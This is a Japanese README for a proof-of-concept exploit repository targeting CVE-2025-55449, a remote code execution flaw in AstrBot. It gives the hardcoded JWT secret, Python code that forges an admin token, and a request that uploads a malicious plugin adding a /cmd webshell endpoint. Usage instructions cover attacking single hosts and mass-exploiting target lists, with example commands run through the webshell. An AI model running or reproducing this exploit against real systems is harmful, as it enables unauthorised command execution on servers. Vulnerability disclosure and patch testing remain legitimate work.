このリポジトリには、AstrBot における重大なリモートコード実行(RCE)脆弱性である CVE-2025-55449 の概念実証エクスプロイトが含まれています。この脆弱性により、攻撃者は脆弱な JWT 認証とプラグインインストール機構を悪用して、対象システム上で任意のコードを実行できます。
この脆弱性は、以下の原因によって存在します。
ハードコードされた JWT シークレットキー: AstrBot は認証にハードコードされた JWT シークレットキー(Advanced_System_for_Text_Response_and_Bot_Operations_Tool)を使用しているため、攻撃者は有効な認証トークンを偽造できます。
制限のないプラグインインストール: /api/plugin/install-upload エンドポイントは、認証済みユーザーが適切な検証なしにプラグインをアップロードおよびインストールできるようにするため、任意の Python コードの実行が可能になります。
プラグインシステムによるコード実行: プラグインシステムにより、プラグインはアプリケーションのルーティングを変更し、Flask/Quart アプリケーションインスタンスを通じて任意のコマンドを実行できます。
JWT トークン偽造: このエクスプロイトは、ハードコードされたシークレットキーを使用して管理者権限を持つ JWT トークンを偽造します。
コード実行の脆弱性: バックエンドのリモートコード実行の脆弱性は、アプリケーションに組み込まれているプラグイン拡張機能を悪用し、ユーザーがカスタムプラグインパッケージをアップロードできるようにします。プログラムはパッケージを解凍し、プラグインの情報を読み取り、オブジェクトの Python ファイルをインポートしてコードを実行します。
1. Forge JWT token with hardcoded secret
2. Create malicious plugin ZIP file
3. POST to /api/plugin/install-upload with forged token
4. Plugin installs and adds /cmd endpoint
5. Execute commands via /cmd?cmd=<command>
jwt (PyJWT)requestszipfile (組み込み)argparse (組み込み)datetime (組み込み)pathlib (組み込み)git clone <repository-url>
cd CVE-2025-55449
pip install PyJWT requests
単一のターゲット URL に対してエクスプロイトを実行します:
python main.py http://target-ip:port
1 行に 1 つの URL を記述したファイル(ip.txt)を作成します:
http://target1:6185
http://target2:6185
http://target3:6185
次に実行します:
python main.py -r ip.txt
エクスプロイトが成功すると、スクリプトは以下を出力します:
http://target-ip:port/cmd?cmd=id
その後、以下にアクセスしてコマンドを実行できます:
http://target-ip:port/cmd?cmd=<your-command>
例:
http://target-ip:port/cmd?cmd=whoami
http://target-ip:port/cmd?cmd=ls -la
CVE-2025-55449/
├── main.py # Main exploit script
├── ip.txt # Example target URLs file
├── README.md # This file
└── helloworld/ # Malicious plugin directory
├── main.py # Plugin code that adds /cmd endpoint
├── metadata.yaml # Plugin metadata
├── LICENSE # Plugin license
└── README.md # Plugin readme
このエクスプロイトは、ハードコードされた JWT シークレットを使用して有効な認証トークンを作成します:
key = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
payload = {"username": "admin", "exp": datetime.datetime.utcnow() + datetime.timedelta(days=7)}
forged = jwt.encode(payload, key, algorithm="HS256")
プラグイン(helloworld/main.py)は、Python のインポートシステムと Flask/Quart のアプリケーションインスタンスを悪用して、新しいルートを注入します:
# The plugin finds the Quart application instance and adds a /cmd route
# that executes arbitrary commands via os.popen()
このエクスプロイトは、プラグインを ZIP ファイルとしてパッケージ化し、認証済みエンドポイント経由でアップロードします:
requests.post(
url + "/api/plugin/install-upload",
headers={"Authorization": "Bearer " + forged},
files={"file": (name + ".zip", zip_payload_bytes)}
)